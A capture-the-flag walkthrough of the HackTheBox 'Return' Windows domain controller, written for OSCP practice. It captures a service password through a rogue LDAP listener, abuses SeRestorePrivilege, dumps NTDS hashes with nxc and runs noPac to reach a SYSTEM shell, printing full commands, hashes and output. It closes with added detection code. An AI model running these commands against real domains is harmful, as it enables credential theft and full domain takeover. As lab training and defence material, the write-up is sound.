Return | HackTheBox | OSCP Preparation

SilentExploit · ~10 min read · March 24, 2026 (Updated: March 24, 2026)

Start off by setting the target machine's IP as an environment variable:

```
┌──(root㉿user)-[/home/user/SELOAD]
└─# export target=10.129.95.241

┌──(root㉿user)-[/home/user/SELOAD]
└─# echo $target
10.129.95.241
```

First, run an nmap scan against the target: a full TCP port sweep reporting only open ports, then a version and default-script scan of the top 1000 ports, then the vuln script category.

```
┌──(root㉿user)-[/tmp/cert]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-23 21:04 PDT
Initiating Parallel DNS resolution of 1 host. at 21:04
Completed Parallel DNS resolution of 1 host. at 21:04, 0.00s elapsed
Initiating SYN Stealth Scan at 21:04
Scanning 10.129.95.241 [65535 ports]
Discovered open port 135/tcp on 10.129.95.241
Discovered open port 139/tcp on 10.129.95.241
Discovered open port 53/tcp on 10.129.95.241
Discovered open port 445/tcp on 10.129.95.241
Discovered open port 80/tcp on 10.129.95.241
Discovered open port 49665/tcp on 10.129.95.241
Discovered open port 3269/tcp on 10.129.95.241
Discovered open port 389/tcp on 10.129.95.241
Discovered open port 5985/tcp on 10.129.95.241
Discovered open port 49666/tcp on 10.129.95.241
Discovered open port 47001/tcp on 10.129.95.241
Discovered open port 3268/tcp on 10.129.95.241
Discovered open port 49674/tcp on 10.129.95.241
Discovered open port 49688/tcp on 10.129.95.241
Discovered open port 49667/tcp on 10.129.95.241
Discovered open port 49675/tcp on 10.129.95.241
Discovered open port 49664/tcp on 10.129.95.241
Discovered open port 49697/tcp on 10.129.95.241
Discovered open port 49677/tcp on 10.129.95.241
```
```
Discovered open port 464/tcp on 10.129.95.241
Discovered open port 593/tcp on 10.129.95.241
Discovered open port 49681/tcp on 10.129.95.241
Discovered open port 49673/tcp on 10.129.95.241
Discovered open port 9389/tcp on 10.129.95.241
Discovered open port 636/tcp on 10.129.95.241
Discovered open port 88/tcp on 10.129.95.241
Completed SYN Stealth Scan at 21:05, 40.63s elapsed (65535 total ports)
Nmap scan report for 10.129.95.241
Host is up (0.12s latency).
Not shown: 64098 closed tcp ports (reset), 1411 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49677/tcp open  unknown
49681/tcp open  unknown
49688/tcp open  unknown
49697/tcp open  unknown

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 40.76 seconds
           Raw packets sent: 81990 (3.608MB) | Rcvd: 75090 (3.022MB)

Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-23 21:05 PDT
[...] elapsed (1000 total ports)
Completed NSE at 21:05, 5.86s elapsed
Initiating NSE at 21:05
Completed NSE at 21:05, 0.00s elapsed
Nmap scan report for 10.129.95.241
Host is up (0.13s latency).
```
```
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-23 20:24:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.95.241
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.129.95.241:80/settings.php
|     Form id:
|_    Form action:
|_http-dombased-xss: Couldn't find any DOM based XSS.
```
```
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
```

Note: I have snipped some of the output from the above command as it is very lengthy, but the important takeaway here is the domain name: return.local

This was an interesting box because enumerating usernames in the usual way yielded no results and the guest account was locked. If you find yourself in this scenario, start enumerating the website and look for any uncommon services in the Nmap scan.

There was a web server open on port 80, which takes us to the HTB Printer Admin Panel. Modify the /settings.php page to the following:

- Server address: YOUR Kali machine's IP
- Server port: your listener's port

Click 'update' to send yourself a reverse connection. This isn't a shell: the panel performs an LDAP bind against whatever server address you gave it, so the listener receives the password for the svc-printer account in clear.

```
┌──(root㉿user)-[/tmp/cert]
└─# rlwrap nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.15.93] from (UNKNOWN) [10.129.95.241] 54685
0*`%return\svc-printer�
0*`%return\svc-printer�
1edFg43012!!
```

With this, I began enumerating the target using NXC:

```
┌──(root㉿user)-[/tmp/cert]
└─# nxc smb $target -u svc-printer -p '1edFg43012!!' --shares
SMB   10.129.95.241   445   PRINTER   [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB   10.129.95.241   445   PRINTER   [+] return.local\svc-printer:1edFg43012!!
```
```
SMB   10.129.95.241   445   PRINTER   [*] Enumerated shares
SMB   10.129.95.241   445   PRINTER   Share      Permissions   Remark
SMB   10.129.95.241   445   PRINTER   -----      -----------   ------
SMB   10.129.95.241   445   PRINTER   ADMIN$     READ          Remote Admin
SMB   10.129.95.241   445   PRINTER   C$         READ,WRITE    Default share
SMB   10.129.95.241   445   PRINTER   IPC$       READ          Remote IPC
SMB   10.129.95.241   445   PRINTER   NETLOGON   READ          Logon server share
SMB   10.129.95.241   445   PRINTER   SYSVOL     READ          Logon server share

┌──(root㉿user)-[/tmp/cert]
└─# nxc smb $target -u svc-printer -p '1edFg43012!!' --users
SMB   10.129.95.241   445   PRINTER   [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB   10.129.95.241   445   PRINTER   [+] return.local\svc-printer:1edFg43012!!
SMB   10.129.95.241   445   PRINTER   -Username-      -Last PW Set-         -BadPW-   -Description-
SMB   10.129.95.241   445   PRINTER   Administrator   2021-07-16 15:03:22   0         Built-in account for administering the computer/domain
SMB   10.129.95.241   445   PRINTER   Guest                                 0         Built-in account for guest access to the computer/domain
SMB   10.129.95.241   445   PRINTER   krbtgt          2021-05-20 13:26:54   0         Key Distribution Center Service Account
SMB   10.129.95.241   445   PRINTER   svc-printer     2021-05-26 08:15:13   0         Service Account for Printer
SMB   10.129.95.241   445   PRINTER   [*] Enumerated 4 local users: RETURN
```

We have read/write access on C$. I had initially created a malicious LNK file to see if we could intercept any domain user hashes using lnkbomb, but this failed. I then logged in as the compromised user via Evil-WinRM:

```
┌──(root㉿user)-[/home/user/Downloads/noPac]
└─# evil-winrm -i $target -u svc-printer -p '1edFg43012!!'
```
```
Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

*Evil-WinRM* PS C:\Users\svc-printer\Documents>
```

This is an EXTENSIVE list of privileges. It makes the path to administrator / domain compromise multifaceted, so I will illustrate multiple ways of obtaining administrator privileges.

Privilege Escalation Method 1: SeRestorePrivilege PS1 script

Grab the Invoke-SeRestoreAbuse.ps1 script from its GitHub repo and transfer it to the target machine; below is the output demonstrating how to use SeRestorePrivilege to get code execution as administrator. Jump over to revshell and grab yourself a base64-encoded PowerShell reverse shell, add your IP and port, then paste the PowerShell command (shown below).

```
*Evil-WinRM* PS C:\Windows\Temp> Import-Module ./Invoke-SeRestoreAbuse.ps1
*Evil-WinRM* PS C:\Windows\Temp> Invoke-SeRestoreAbuse -Command 'cmd /c powershell -c "net user administrator Password123."'
```
```
The command completed successfully.
```

Note: I prefer to get a shell as administrator rather than changing the password, but you could technically replace the PowerShell reverse shell (in the Evil-WinRM session) with the command above to achieve the same result.

I confirmed that the password change for administrator was successful, then used NXC's built-in ntdsutil module to dump the ntds.dit:

```
┌──(root㉿user)-[/home/user/SELOAD]
└─# nxc smb $target -u administrator -p 'Password123.'
SMB   10.129.95.241   445   PRINTER   [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB   10.129.95.241   445   PRINTER   [+] return.local\administrator:Password123. (Pwn3d!)

┌──(root㉿user)-[/home/user/SELOAD]
└─# nxc smb $target -u administrator -p 'Password123.' -M ntdsutil
SMB        10.129.95.241   445   PRINTER   [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB        10.129.95.241   445   PRINTER   [+] return.local\administrator:Password123. (Pwn3d!)
NTDSUTIL   10.129.95.241   445   PRINTER   [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\177430794
NTDSUTIL   10.129.95.241   445   PRINTER   Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL   10.129.95.241   445   PRINTER   [+] NTDS.dit dumped to C:\Windows\Temp\177430794
NTDSUTIL   10.129.95.241   445   PRINTER   [*] Copying NTDS dump to /tmp/tmp0m2ajky5
NTDSUTIL   10.129.95.241   445   PRINTER   [*] NTDS dump copied to /tmp/tmp0m2ajky5
NTDSUTIL   10.129.95.241   445   PRINTER   [+] Deleted C:\Windows\Temp\177430794 remote dump directory
NTDSUTIL   10.129.95.241   445   PRINTER   [+] Dumping the NTDS, this could take a while so go grab a redbull...
```
```
NTDSUTIL   10.129.95.241   445   PRINTER   Administrator:500:aad3b435b51404eeaad3b435b51404ee:fa7665befe243a5079d1c602f5524ce0:::
NTDSUTIL   10.129.95.241   445   PRINTER   Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL   10.129.95.241   445   PRINTER   PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:c927454eb1cfb39921a985d27c6698b0:::
NTDSUTIL   10.129.95.241   445   PRINTER   krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
NTDSUTIL   10.129.95.241   445   PRINTER   return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
NTDSUTIL   10.129.95.241   445   PRINTER   [+] Dumped 5 NTDS hashes to None.ntds of which 4 were added to the database
NTDSUTIL   10.129.95.241   445   PRINTER   [*] To extract only enabled accounts from the output file, run the following command:
NTDSUTIL   10.129.95.241   445   PRINTER   [*] grep -iv disabled None.ntds | cut -d ':' -f1
```

This is the golden key to the domain, as it dumps the hashes for every domain user. This enables lateral movement, but there is one caveat: the ntds.dit is stored ON THE DOMAIN CONTROLLER. Trying to dump the ntds.dit on a machine that is not the DC is fruitless.

Privilege Escalation Method 2: SeBackupPrivilege

Dumping the hives: a user with this privilege can back up the Windows registry hives, specifically the SAM, SYSTEM and SECURITY files. Backing them up is a post-exploitation technique used to extract the machine's "boot key", which then allows us to decrypt and dump local user credentials and cached password hashes for offline cracking or lateral movement. Follow the exact steps I outlined in Cicada to do this; you can then log in as the administrator using the hash you receive after running impacket-secretsdump.

Privilege Escalation Method 3: noPac

NetExec has a built-in module that checks whether a domain controller is vulnerable to noPac. The output below confirms that the two TGTs requested (one with a PAC, one without) come back in two different sizes, which means it is vulnerable.
```
┌──(root㉿user)-[/home/user/Downloads]
└─# nxc smb $target -u svc-printer -p '1edFg43012!!' -M nopac
SMB     10.129.95.241   445   PRINTER   [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB     10.129.95.241   445   PRINTER   [+] return.local\svc-printer:1edFg43012!!
NOPAC   10.129.95.241   445   PRINTER   TGT with PAC size 1483
NOPAC   10.129.95.241   445   PRINTER   TGT without PAC size 718
NOPAC   10.129.95.241   445   PRINTER
NOPAC   10.129.95.241   445   PRINTER   VULNERABLE
NOPAC   10.129.95.241   445   PRINTER   Next step: https://github.com/Ridter/noPac
```

a) Using noPac to dump the NT hash of the domain administrator

-dc-host is the NetBIOS computer name: PRINTER (as confirmed by all the NXC scans above).

```
┌──(venv)─(root㉿user)-[/home/user/Downloads/noPac]
└─# python3 noPac.py return.local/svc-printer:'1edFg43012!!' -dc-ip $target -use-ldap -dc-host PRINTER --impersonate administrator -dump -just-dc-user administrator

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target PRINTER.return.local
[*] will try to impersonate administrator
[*] Already have user administrator ticket for target PRINTER.return.local
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fa7665befe243a5079d1c602f5524ce0:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8e85953292c2deb573c1f7b784cb6c364935bd459d0e31b1496d91f16bee3bf2
Administrator:aes128-cts-hmac-sha1-96:9fd6cdd03aa2cac8c3e165d14714eefa
Administrator:des-cbc-md5:8026f8f79bec75dc
[*] Cleaning up...
```
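On the defender's side this technique leaves a distinctive trail in the DC's Security log: a computer account is created (event 4741), its sAMAccountName is changed to the DC's own name without the trailing '$' (event 4742), and after the ticket is obtained it is changed back. The detection below is an added example, not code from the post or from noPac; the event records are constructed, the field names (subject, target, sam) are simplified stand-ins for the real 4741/4742 fields, and PRINTER is the DC name from the nxc output.

```python
"""Flag noPac-style sAMAccountName spoofing (CVE-2021-42278) in DC Security events.
Added example, not part of the original post: create machine account (4741), rename
its sAMAccountName to the DC's name without '$' (4742), use it, rename it back (4742)."""
from datetime import datetime, timedelta

DC_NAMES = {"PRINTER"}  # NetBIOS names of the domain controllers (from the nxc banner)

# Constructed sample events; only the event IDs and the sAMAccountName field are real.
SAMPLE_EVENTS = [
    {"id": 4741, "time": "2026-03-23T21:40:00", "subject": "RETURN\\svc-printer",
     "target": "WIN-YAW3WZHOYRP$", "sam": "WIN-YAW3WZHOYRP$"},
    {"id": 4742, "time": "2026-03-23T21:40:02", "subject": "RETURN\\svc-printer",
     "target": "WIN-YAW3WZHOYRP$", "sam": "PRINTER"},           # '$' dropped, DC name
    {"id": 4742, "time": "2026-03-23T21:40:05", "subject": "RETURN\\svc-printer",
     "target": "WIN-YAW3WZHOYRP$", "sam": "WIN-YAW3WZHOYRP$"},  # restored
    {"id": 4742, "time": "2026-03-23T22:10:00", "subject": "RETURN\\Administrator",
     "target": "LAPTOP07$", "sam": "LAPTOP07$"},                # benign change
]


def find_samaccountname_spoofing(events, dc_names=DC_NAMES, window=timedelta(minutes=10)):
    """Return a finding for every 4742 whose new sAMAccountName lacks the trailing '$'
    or collides with a DC name. Confidence is 'high' when the same subject created the
    object (4741) within `window` before the change, 'medium' otherwise."""
    created = {}  # target object -> (creation time, creator)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4741:
            created[ev["target"]] = (when, ev["subject"])
        if ev["id"] != 4742:
            continue
        sam = ev["sam"]
        reasons = []
        if not sam.endswith("$"):
            reasons.append("computer account renamed without trailing '$'")
        if sam.rstrip("$").upper() in dc_names:
            reasons.append("new name collides with a domain controller")
        if not reasons:
            continue
        confidence = "medium"
        origin = created.get(ev["target"])
        if origin and origin[1] == ev["subject"] and when - origin[0] <= window:
            confidence = "high"
        findings.append({"target": ev["target"], "new_sam": sam, "subject": ev["subject"],
                         "confidence": confidence, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_samaccountname_spoofing(SAMPLE_EVENTS):
        print(f"[{f['confidence']}] {f['subject']} renamed {f['target']} -> {f['new_sam']}: "
              + "; ".join(f["reasons"]))
```

The restore to the original name and the benign LAPTOP07$ change produce no finding, so the rule fires once, on the rename to PRINTER.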
You can then use this hash to log in via Evil-WinRM (or any other NTLM-authenticated service), since NTLM accepts the NT hash in place of the password (pass-the-hash).

```
┌──(venv)─(root㉿user)-[/home/user/Downloads/noPac]
└─# evil-winrm -i $target -u administrator -H fa7665befe243a5079d1c602f5524ce0

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
return\administrator
```

b) Getting an instant shell as administrator with noPac; no pass-the-hash required (not the best option imo)

```
┌──(venv)─(root㉿user)-[/home/user/Downloads/noPac]
└─# python3 noPac.py return.local/svc-printer:'1edFg43012!!' -dc-ip $target -use-ldap -dc-host PRINTER -shell --impersonate administrator

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target PRINTER.return.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-YAW3WZHOYRP$"
[*] MachineAccount "WIN-YAW3WZHOYRP$" password = dbzaCIh)AQzJ
[*] Successfully added machine account WIN-YAW3WZHOYRP$ with password dbzaCIh)AQzJ.
```
```
[*] WIN-YAW3WZHOYRP$ object = CN=WIN-YAW3WZHOYRP,CN=Computers,DC=return,DC=local
[*] WIN-YAW3WZHOYRP$ sAMAccountName == PRINTER
[*] Saving a DC's ticket in PRINTER.ccache
[*] Reseting the machine account to WIN-YAW3WZHOYRP$
[*] Restored WIN-YAW3WZHOYRP$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_PRINTER.return.local.ccache
[*] Attempting to del a computer with the name: WIN-YAW3WZHOYRP$
[-] Delete computer WIN-YAW3WZHOYRP$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
```
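Going back to the credential capture on port 389: the printer panel performs an LDAP simple bind, and in a simple bind the DN and password are plain BER octet strings, which is why nc could print them. The decoder below is an added example, not code from the post; the packet it parses is constructed to match the bytes shown in that capture, and is_credentialed_cleartext_bind is the check a wire-level detector for cleartext LDAP credentials would apply.

```python
"""Decode an LDAP BindRequest (RFC 4511, BER) and flag cleartext simple binds.
Added example, not from the original post; SAMPLE_BIND is constructed to match the
bytes the nc listener printed above ('0*`%return\\svc-printer ... 1edFg43012!!')."""

SAMPLE_BIND = (
    b"\x30\x2a"                          # SEQUENCE (LDAPMessage), 42 bytes
    b"\x02\x01\x01"                      #   messageID INTEGER 1
    b"\x60\x25"                          #   [APPLICATION 0] BindRequest, 37 bytes
    b"\x02\x01\x03"                      #     version INTEGER 3
    b"\x04\x12" b"return\\svc-printer"   #     name OCTET STRING, 18 bytes
    b"\x80\x0c" b"1edFg43012!!"          #     authentication simple [0], 12 bytes
)


def _tlv(buf, pos):
    """Read one BER tag-length-value at pos -> (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(packet):
    """Return message_id, version, bind name, auth kind and password length for a
    BindRequest, or None for any other LDAP operation (search, unbind, ...)."""
    tag, msg, _ = _tlv(packet, 0)
    if tag != 0x30:
        return None
    id_tag, mid, pos = _tlv(msg, 0)
    op_tag, body, _ = _tlv(msg, pos)
    if id_tag != 0x02 or op_tag != 0x60:
        return None
    _, ver, pos = _tlv(body, 0)
    _, name, pos = _tlv(body, pos)
    auth_tag, auth, _ = _tlv(body, pos)
    auth_kind = {0x80: "simple", 0xA3: "sasl"}.get(auth_tag, "unknown")
    return {"message_id": int.from_bytes(mid, "big"), "version": ver[0],
            "name": name.decode("utf-8", "replace"), "auth": auth_kind,
            "password_len": len(auth) if auth_kind == "simple" else 0}


def is_credentialed_cleartext_bind(packet):
    """True when a simple bind carries a non-empty password: on plain port 389 that is
    a domain credential on the wire, exactly what the printer panel handed to nc."""
    bind = parse_bind_request(packet)
    return bool(bind) and bind["auth"] == "simple" and bind["password_len"] > 0


if __name__ == "__main__":
    info = parse_bind_request(SAMPLE_BIND)
    print(info, "-> cleartext credential on the wire:", is_credentialed_cleartext_bind(SAMPLE_BIND))
```

An anonymous bind (empty password) or a SASL bind does not trip the check, so it is specific to the failure mode this box demonstrates: an application account's password leaving the host in a plain simple bind to an address an unprivileged web user can choose.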